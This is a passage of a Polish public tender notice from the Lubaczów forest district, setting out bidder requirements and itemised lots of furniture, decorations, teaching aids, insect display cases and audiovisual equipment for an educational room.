1.18.	Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w Art. 26 ust. 3 ustawy pzp, nie złożył dokumentów lub oświadczeń, o których mowa w Art. 25 ust. 1 ustawy pzp, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie. 
1.19.	Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana:
a. odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie: 
b. nie wniósł wymaganego zabezpieczenia należytego wyko?nania umowy:
c. zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Sytuacja ekonomiczna i finansowa
O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy posiadają ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia; 
 a)   jeżeli oferta składana jest na 1 zadanie częściowe-  na sumę nie niższą niż 10.000,00 PLN lub załączą do oferty pisemne zobowiązanie do zawarcia takiego ubezpieczenia przed zawarciem Umowy 
b)     jeżeli oferta składana jest  na więcej niż 1 zadanie częściowe kwotę ubezpieczenia 10000,00 zł należy sumować do ilości części na które została złożona oferta.
W przypadku, gdy złożone przez Wykonawcę dokumenty zawierają dane w innych walutach niż określono to w treści SIWZ, zamawiający jako kurs przeliczeniowy waluty przyjmuje średni kurs NBP z dnia wszczęcia postępowania. Jeżeli e dniu wszczęcia postępowania kurs danej waluty nie był ogłaszany przez NPB, obowiązuje kurs ogłoszony bezpośrednio przed wszczęciem postępowania.
Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia w oparciu o złożone dokumenty oraz oświadczeń</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zakazuje się istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy. 
2.	Zamawiający zastrzega sobie prawo do rezygnacji z wykonania okablowania Sali edukacyjnej .</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> bip.lasy.gov.pl/pl/bip/dg/rdlp_krosno/nadl_lubaczow/zamowienia_publiczne<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Nadleśnictwo Lubaczów w Lubaczowie, ul. Słowackiego 20, 37-600 Lubaczów.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 31.12.2012 godzina 10:00, miejsce: Nadleśnictwo Lubaczów w Lubaczowie, ul. Słowackiego 20, 37-600 Lubaczów, pokój nr 1..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zadanie dofinansowane ze środków EFRR w ramach IV osi priorytetowej            Regionalnego Programu Operacyjnego Województwa Podkarpackiego na lata 2007-2013 
Ochrona środowiska i zapobieganie zagrożeniom, 
DZIAŁANIE 4.3 Zachowanie oraz ochrona różnorodności biologicznej i krajobrazowej.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Temat 1: Zakup i instalacja rolet elektrycznych -4 szt.Temat 2: Zakup , dostawa i montaż mebli do Sali edukacyjnej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Temat 1: Zakup i instalacja rolet elektrycznych -4 szt.
Wspólny Słownik Zamówień: 39515400-9 Rolety 
Opis: elektryczne rolety zaciemniające do projekcji multimedialnych -4 szt. będą wykonane z tkanin z atestem trudno zapalności i nie rozprzestrzeniania ognia . Kasety osłonowe rur nawojowych I boczne prowadnice tkaniny lakierowane. Rolety automatyczne ze sterowaniem na pilota radiowego lub podczerwień. 
Wymiary: 180 x 150 mm z siłownikiem tubowym TM 35 lub TM 25.     

Temat 2: Zakup , dostawa i montaż mebli do Sali edukacyjnej:
Wspólny Słownik Zamówień: 39100000-3 Meble
1.	Opis: Stoły edukacyjne szt. 4 - wykonane z litego dębu, lakierowane lakierem bezbarwnym, wymiary: wysokość 70 cm, długość 143 cm, szerokość 78 cm, blat stołu z grafiką edukacyjną - grafika kolorowa - trwale malowana na blacie /na litym drewnie lub sklejce/
-  jeden stół z grafiką o ptakach,
-  jeden stół z grafiką o zwierzętach,
-  jeden stół z grafiką o owocach leśnych,
-  jeden stół z grafiką o płazach i gadach.
2.	Ławki dębowe 8 szt. - wykonane z litego dębu, lakierowane, bez oparcia, wymiary: wysokość siedziska 42 cm, szerokość 27 cm, długość 140 cm.
3.	Szafki małe - 4 szt.  wykonane z litego dębu, lakierowane, wymiary: wysokość 59 cm, szerokość 90 cm, głębokość 43 cm, z. edukacyjną zwierząt lub roślin na frontach z podpisem w języku polskim i łacińskim - grafika /trwale malowana na drzwiach /na litym drewnie lub sklejce.
4.	Szafa na owoce leśne - wykonana z litego dębu, lakierowana, wymiary: wysokość 137 cm, szerokość 58 cm, głębokość 43 cm z szufladami. Na szufladach grafika edukacyjna - owoce leśne wraz z podpisem nazwy w języku polskim oraz łacińskim. - grafika /trwale malowana na drzwiach /na litym drewnie lub sklejce.
5.	Szafka duża - 2 szt. wykonane z litego dębu, lakierowane, wymiary: wysokość 113 cm, szerokość 90 cm, głębokość 43 cm z grafiką edukacyjną o roślinach lub zwierzętach na frontach z podpisem nazw w języku polskim i łacińskim - grafika / trwale malowana na drzwiach /na litym drewnie lub sklejce.
6.	Biurko i krzesło dębowe podrzeźbiane artystycznie - 1 komplet - wymiary stołu: wysokość 75 cm, szerokość 80 cm, wykonane z litego dębu, lakierowane, wymiary krzesła z oparciem: wysokość siedziska  43 cm, materiał lity dąb.  Biurko obudowane z trzech stron i podrzeźbiane od frontu, natomiast w krześle podrzeźbiane oparcie.
7.  Stoły i krzesła - 1 komplet obejmujący 70 szt. krzeseł oraz stoły dzielone tworzące  jeden ciąg o szerokości  70 cm i długości 18 mb, ułożonych w kształt podkowy . 
Opis materiału na stoły: - jasny buk, wymiary i kształt zgodnie z
załączonym rysunkiem.
Zasadnicze wymagania:
1. płyta meblowa o grubości min. 36 mm., matowa z widoczną strukturą drewna:
2. nogi i stelaż- wykonane na bazie rury stalowej, chromowanej, matowej o średnicy od 60 do 80 mm.
3. krawędzie oklejone PCV min. 2 mm. w kolorze płyty
4. stół zmontowany w całości.
5. - wysokość stołów 76 cm

Krzesło stacjonarne -kolor jasny buk
Zasadnicze wymagania:
1. podstawa drewno bukowe - cztery nogi
2. siedzisko i oparcie tapicerowane pianką PU i tkaniną trudno zapalną o odporności na ścieranie min.20 000 cykli; w kolorach i wzorze do uzgodnienia z zamawiającym,
3. konstrukcja siedziska i oparcia wykonana ze sklejki:
4. stopki chroniące podłogę przed zarysowaniem.
5.  wysokość siedzisk 46 cm.

Wymiary stołów i krzeseł wg. Normy Europejskiej: PN - EN 1729-1:2007 /Meble - Krzesła i stoły do instytucji edukacyjnych Część 1: Wymiary funkcjonalne/, oraz PN - EN 1729-2:2007 /Meble - Krzesła i stoły do instytucji edukacyjnych Część 2: Wymagania bezpieczeństwa i metody badań/.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.10.00.00-3, 39.51.54.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.03.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zakup dostawa i montaż elementów wyposażenia /dekoracji/  Sali edukacyjnej..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Temat:  Zakup dostawa i montaż elementów wyposażenia /dekoracji/  Sali edukacyjnej.

Wspólny Słownik Zamówień: 39290000-1 Wyposażenie różne

Opis. Zakup dostawa i montaż elementów wyposażenia /dekoracji/  Sali edukacyjnej:

1.	Drzewo artystyczne wraz z kompletem  tj. 15 gatunków ptaków śpiewających malowanych z gipsu / wykaz ptaków;  rudnik, słowik szary,  drozd śpiewak, kos, mysikrólik, bogatka, modraszka, czubatka, raniuszek, kowalik, sójka, wilga, zięba, gil, grubodziób / -  pień drzewa z gałęziami i korą o wysokości 2,0 m z umieszczonymi na gałęziach ptakami  śpiewającymi wykonanymi z gipsu. Wielkość ptaków oraz ich barwa odzwierciedlający ich wygląd naturalny. 
2.	Obicie artystyczne słupów nośnych drewnem oraz umieszczenie dzięciołów  na słupach - obicie słupów nośnych drewnem wraz z korą oraz umieszczenie na nich dzięciołów wykonanych z żywicy o naturalnym ubarwieniu oraz rozmiarze. - komplet 6 gatunków: dzięcioł duży, dzięcioł średni, dzięcioł zielony, dzięciołek dzięcioł trójpalczasty i dzięcioł czarny.
3.	Elementy dekoracyjne /sztukateria gipsowa - liście, linia dekoracyjna, juta maskująca, ptaki, motyle drewniane wycięte po konturach/ - liście dębowe wykonane z gipsu sztukateryjnego o naturalnych rozmiarach artystycznie pomalowane - ilość min. 30 szt., juta maskująca - tkanina maskująca o wymiarach 137x366 cm - 2 szt., motyle drewniane wycięte po konturach  x 10szt. 
                                                 Linia dekoracyjna -
4.	Galeria drzew na drewnie w ramach artystycznie woskowanych - namalowane na drewnie gatunki polskich drzew - 25 sztuk / wykaz drzew: jodła pospolita, świerk pospolity, modrzew europejski, sosna pospolita, topola osika, topola biała, topola czarna, wierzba krucha, brzoza brodawkowata, brzoza omszona, olsza czarna, grab pospolity, buk pospolity, dąb szypułkowy, dąb bezszypułkowy, wiąz górski, wiąz szypułkowy, jarząb pospolity, czeremcha pospolita, klon jawor, klon pospolity, klon polny, lipa drobnolistna, lipa szerokolistna, jesion wyniosły / wraz z podpisaniem nazwy w języku polskim i łacińskim. Wymiary  wraz z ramą 25,5 cm x 35,5 cm. Ramy artystycznie woskowane w kolorze brązowym.
5.	Mały zestaw interaktywny do wnętrz /do powieszenia na ścianie/ - 4 szt. - o treści
-Jakie to drzewo,
-jaki to ptak, 
-jakie to zwierzęta, 
-czyj to ślad, 
wymiary: wysokość 48 cm, szerokość 72 cm - wyposażony w 12 obracanych tabliczek z opisem z jednej strony oraz z ilustracją z drugiej strony. 

        6.   Mały zestaw interaktywny do wewnątrz, sztalugi, torba /do prezentacji w terenie/ -  wymiary tablic: wysokość 48 cm, szerokość 72 cm - wyposażony w 12 obracanych tabliczek z opisem z jednej strony oraz z ilustracją z drugiej strony. Sztaluga wykonana z drewna bukowego, zabezpieczona impregnatem i polakierowana. Wymiary sztalugi: wysokość podstawy min. 65 cm, szerokość podstawy min. 50 cm, wysokość całkowita sztalugi 1,40 - 1,50 m., wyposażona w regulację ustawień umożliwiającą stabilne utrzymanie obrazów o wysokości 103 m.
       7.   Zegar na drewnie do powieszenia na ścianie - zegar okrągły o średnicy min. 32 cm, z grafiką edukacyjną o tematyce przyrodniczej, z personalizacją w jednym kolorze: logo LP, nazwa i adres Zamawiajacego , informacja o dofinansowaniu projektu.
       8.   Logo Lasów Państwowych - płaskorzeźba - okrągła płaskorzeźba w drewnie o średnicy min. 30 cm. woskowana. 
       9.   Słupek dębowy  - stojąca naturalna kłoda dębowa z korą długości  od 1,5 do 2,0 m i średnicy min. 0,5 m. Kłoda powinna posiadać wiele ruchomych elementów, w których uwidoczniony będzie zróżnicowany stopień rozkładu drewna wraz  z owadami w nim żerującymi oraz chodnikami owadzimi. Wnętrze kłody podświetlone.
      10.  Gabloty z owadami i motylami - 1 komplet /gablot/- Gabloty entomologiczne do zawieszenia na ścianie o wymiarach 50 x 40 x 6 cm wykonane z drewna dębowego, lakierowane wysokiej klasy lakierem poliuretanowym, szkło 2 mm float, spód z płyty HDF 3 mm, wyklejone pianką polietylenową. Zamknięcie na podwójne pióro. Gabloty mają zawierać  następujące owady wraz z opisem nazwy polskiej i łacińskiej:
GABLOTA I
I.	PIERWOTNE SZKODNIKI DRZEWOSTANÓW IGLASTYCH
1.	Zawisak borowiec,
2.	Barczatka sosnówka,
3.	Brudnica mniszka - samiec,
4.	Brudnica mniszka - samica,
5.	Strzygonia choinówka,
6.	Poproch cetyniak,
7.	Osnuja gwiaździsta,
8.	Borecznik sosnowiec
II.	SZKODNIKI UPRAW I MŁODNIKÓW IGLASTYCH
1.	Zwójka sosnóweczka,
2.	Zwójka pędówka,
3.	Skośnik tuzinek,
4.	Szeliniak sosnowiec,
5.	Smolik znaczony,
6.	Borecznik rudy,
7.	Kluk czarny,
8.	Osnuja czerwono głowa,
9.	Sieciech niegłębek,
10.	Choinek szary,
11.	Osnuja sadzonkowa,
12.	Smolik drągowinowiec
III.	SZKODNIKI NASION I SZYSZEK
1.	Szyszeń sosnowy,
2.	Smolik szyszkowiec,
3.	Szyszeń pospolity
IV.	SZKODNIKISYSTEMÓW KORZENIOWYCH SIEWEK I SADZONEK
1.	Turkuć podjadek,
2.	Chrabąszcz majowy - samiec,
3.	Chrabąszcz majowy - samica,
4.	Wałkarz lipczyk
V.	SZKODNIKI DRZEWOSTANÓW ŚREDNICH I STARSZYCH KLAS WIEKU
1.	Tycz cieśla,
2.	Przypłaszczek granatek,
3.	Żerdzianka sosnówka,
4.	Kornik sześciozębny,
5.	Cetyniec większy,
6.	Drwalnik paskowany,
7.	Kornik drukarz,
8.	Rytownik pospolity, 
9.	Czterooczak świerkowiec,
10.	Żerdzianka krawiec,
11.	Jodłowiec krzywozębny,
12.	Jodłowiec kolcozębny,
13.	Jodłowiec Woroncowa,
14.	Smolik jodłowiec,
15.	Cetyniec mniejszy 
GABLOTA II
I.	SZKODNIKI PIERWOTNE DRZEWOSTANÓW LIŚCIASTYCH
1.	Brudnica nieparka - samiec,
2.	Brudnica nieparka - samica,
3.	Piędzik przedzimek - samiec,
4.	Piędzik przedzimek - samica,
5.	Szczotecznica szarawka,
6.	Zwójka zieloneczka,
7.	Kuprówka rudnica - samiec,
8.	Kuprówka rudnica - samica,
9.	Białka wierzbówka,
10.	Narożnica zbrojówka
II.	SZKODNIKI UPRAW I MŁODNIKÓW LIŚCIASTYCH
1.	Szerszeń,
2.	Rzemlik osikowiec,
3.	Rzemlik topolowiec,
4.	Rynnica topolówka,
5.	Przeziernik topolowiec,
6.	Hurmak Olchowiec,
7.	Krytoryjek Olchowiec,
8.	Rynnica olchowa
III.	SZKODNIKI NASION I OWOCÓW
1.	Słonik żołędziowiec,
2.	Zwójka skrzydlaneczka,
3.	Pachówka bukwioweczka,
4.	Pachówka żołędzióweczka
IV.	SZKODNIKI SYSTEMÓW KORZENIOWYCH SIEWEK I SADZINEK
1.	Jedwabek brunatny,
2.	Ogrodnica niszczy listka,
3.	Chrabąszcz majowy - samiec,
4.	Chrabąszcz majowy - samica,
5.	Chrabąszcz kasztanowiec - samiec,
6.	Chrabąszcz kasztanowiec - samica,
7.	Listnik zmiennobarwny,
8.	Guniak czerwczyk,
V.	SZKODNIKI DRZEWOSTANÓW ŚREDNICH I STARSZYCH KLAS WIEKU
1.	Galasówka dębianka,
2.	Ogłodek brzozowiec,
3.	Trociniarka czerwica,
4.	Opiętek dwuplamkowy,
5.	Drwionek okrętowiec,
6.	Rębacz szary,
7.	Ściga dębowa,
8.	Paśnik pałączasty,
9.	Paśnik niszczyciel,
10.	Drwalnik,
11.	Drwalniczek Saksesena,
12.	Ogłodek Grabowiec,
13.	Jeśniak czarny,
14.	Ogłodek wiązowiec,
15.	Ogłodek wielorzędowiec.
Dopuszcza się zmianę w wykazach gatunków drzew itp. Za zgodą Zamawiającego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.29.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.03.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zakup pomocy edukacyjnych  do Sali edukacyjnej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Temat: Zakup pomocy edukacyjnych  do Sali edukacyjnej.

 Wspólny Słownik Zamówień: 39162000-5 pomoce naukowe

Opis: Zakup pomocy edukacyjnych  do Sali edukacyjnej:

1.	Tropy zwierząt - 1 komplet - zestaw tropów 10 gatunków zwierząt: sarna, jeleń, dzik, zając, borsuk, lis, wilk, kaczka, wydra, tropy wykonane z żywicy o autentycznych rozmiarach. 
2.	Pieczęci edukacyjne - 1 komplet -  zestaw 13 pieczęci polskich drzew leśnych wykonanych na drenie oraz poduszka z tuszem.
3.	Drzewka edukacyjne - 1 komplet -  15 drewnianych deseczek w formacie 10x15 cm przedstawiających 8 gatunków drewna / wykaz gatunków drewna sosna, świerk, jodła, modrzew, dąb szypułkowy, buk, jesion, olcha czarna/ . Każdy gatunek przedstawiony jest na dwóch deseczkach - na jednej znajduje się nazwa gatunku wraz z nazwą łacińską, a na drugiej ilustracja drzewa, liścia / szyszki oraz nasiona. Nieparzysta deseczka wykonana jest wraz z nazwą oraz ilustracją gatunku.
4.	Plany lekcji - 200 szt. - papier w formacie min. A5 i gramaturze min. 
300 gr/m2, z grafiką o tematyce przyrodniczej, z personalizacją w jednym kolorze: logo LP, nazwa i adres Zamawiającego, informacja o dofinansowaniu projektu, /wzór do uzgodnienia z Zamawiającym/
5.	Zakładki edukacyjne - 300 szt. - o wymiarach 19cm x 5,0cm wykonane z kartonu o gramaturze min. 350 gr/m2, , z grafiką o tematyce przyrodniczej, z personalizacją w jednym kolorze: logo LP, nazwa i adres Zamawiającego, informacja o dofinansowaniu projektu/wzór do uzgodnienia z zamawiającym/
6.	Kolorowanka z naklejkami - mix - kolorowanki o formacie min. A5, min. 12 stron wraz z naklejkami. Rysunki drzew, ptaków, ssaków i owadów naszych lasów, wraz z naklejkami tych zwierząt lub roślin w zestawie /Wzór do uzgodnienia z Zamawiającym/
7.	Księga pamiątkowa - 1 szt.  - księga formatu A4, o gramaturze min. 300 gr/m2, okładka drewniana podrzeźbiana artystycznie. Rzeźba o tematyce przyrodniczej.
8.	Linijki edukacyjne - 100 szt. - wykonane z litego drewna, długości min. 27 cm, z grafiką o tematyce przyrodniczej, z personalizacją w jednym kolorze: logo LP, nazwa i adres Zamawiajacego, informacja o dofinansowaniu projektu /wzór do uzgodnienia z Zamawiającym/
        9.   Tablica ścieralna lakierowana 100x150 cm. - biała tablica z powierzchnią magnetyczną, sucho ścieralną. Odporna na uszkodzenia, osadzona w aluminiowej ramie z plastikowymi rogami. Dołączona półka na mazaki oraz zestaw mazaków..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.16.20.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.03.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zakup sprzętu audiowizualnego na doposażenie świetlicy oraz sali edukacyjnej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakup sprzętu audiowizualnego na doposażenie świetlicy oraz sali edukacyjnej.

Wspólny Słownik Zamówień 32320000-2 Sprzęt telewizyjny i audiowizualny

Opis: Zakup sprzętu audiowizualnego na doposażenie świetlicy oraz sali edukacyjnej.

1.	Zestaw kina domowego - 1 szt.
- tuner radio FM,
- RDS,
- odtwarzanie formatów: DivX, XviD, WMA, MPEG4, MP3,
- odtwarzanie płyt: DVD, DVD-R, DVD-RW,
- Dolby ProLogicll, Dolby ProLogic, Dolby Digital,
- gniazdo SCART / eurozłącze/,
- wyjście HDMI,
- wyjście Composite video RCA Cinch,
- port USB,
- pilot.

2.	Elektryczny ekran projekcyjny 240x240 - 2 szt.
- seria: ekonomiczny,
- szerokość: 240 cm, wysokość 240 cm
- Gain Faktor: 1,2,
- format: 1:1,
-typ: silnik
-czarne obrzeże,
-czarna druga strona ekranu.

3.	Projektor i uchwyt podwieszany - 2 szt.:
- stosunek projekcji: 1.53-2.36:1,
- jasność: 4100 ANSI,
- jasność w trybie ECO: 3280 ANSI,
- rozdzielczość: 1024x768 XGA,
- typ DLP,
- kontrast 3200:1,
- uchwyt do projektora
- stan: HDMI x2, DVI-I, D-SUB 15 pin In /VGA/, D-SUB 15 pin out /VGA/, YUV
Component /RGB/, Cinch-Video, S-Video, RS232, USB TypA, USB TypB, 3,5 mm
Mini Jack, RJ45, 12V Trigger, WLAN zintegrowany, funkcje specjalne: Lens Shift, PC free.

4.	Kamera z głowicą obrotową z intuicyjnym zoom cyfrowym 10X / w tym 2 razy na bezstratny zoom XGA/wyjścia WXGA, 1,9 razy bezstratny zoom SXGA wyjścia/ i digital ręczny zoom, zaawansowane funkcje z funkcją Split screen, możliwość podziału ekranu umożliwiająca projekcję obrazu na żywo i zdjęć z karty SD lub 1GB pamięci wewnętrznej , wbudowany mikrofon, możliwość pisania notatek na żywo, uniwersalny pilot.

5.	Odtwarzacz/nagrywarka DVD - 2 szt.
- funkcja nagrywania płyt,
- system nagrywania: PAL/NTSC,
- rodzaj zapisywanych płyt: DVD+R/RW, 
- obsługa płyt dwu-warstwowych /Dual Layer 8,5 GB/,
- tryb zapisu SLP6 godz./płytę,
- funkcje edycji, 
- odtwarzanie plików: DivX, XviD, WMA, MPEG4, MP3, JPEG
- rodzaj odtwarzanych płyt: DVD, DVD-R, DVD-RW
- odtwarzanie napisów do filmów DivX,
- odtwarzanie z przesunięciem czasowym /HDD/,
- konwersacja do HDTV 1080i, 
- obsługiwane systemy audio Dolby digital AC-3, 
- 2 x gniazdo SCART /eurozłącze/,
- wyjścia HDMI, 
- wejścia Audio RCA Cinch,
- inne gniazda: Komponent video, DV-in,
- port USB,
- nagrywarka combo DVD-VHS,
-pilot,
- zasilanie 220 - 240 V, 50/60Hz,
- szerokość 435 mm,
- wysokość 99 mm,
- głębokość 388 mm.

6.	 Telewizor - 1 szt.
                Z podświetleniem Edge LED o przekątnej 55 cali i rozdzielczości FULL HD /1920 x 1080/. 
               Charakteryzuje się kontrastem dynamicznym na poziomie   jasnością 6 000 000:1, 450 cd/m2 i częstotliwością odświeżania 200 Hz. 
              Wyposażony w tuner DVB-T, DVB-S i DVB-C, dźwięk Mono/Stereo: System audio Infinite  Sound, złącza: 4 x HDMi, 2 x USB 2.0, 2 x kompozytowe, 1 x komponentowe, 1 x Scart, 1 x VGA, 1 x Audio RCA, 1 x Audio cyfrowe optyczne, 1 x słuchawki, 1 x PC Audio (Jack), 1 x Ethernet RJ-45, 1 x Ci+, 1 x RS-232C, 1 x antenna, Bluetooth. Gniazdko scart, 4 x wejście HDMI, wejście PC. 


Dodatkowo należy wykonać okablowanie OEE 

Okablowanie Sali -należy wykonać  w miejscach wskazanych przez Zamawiającego, 
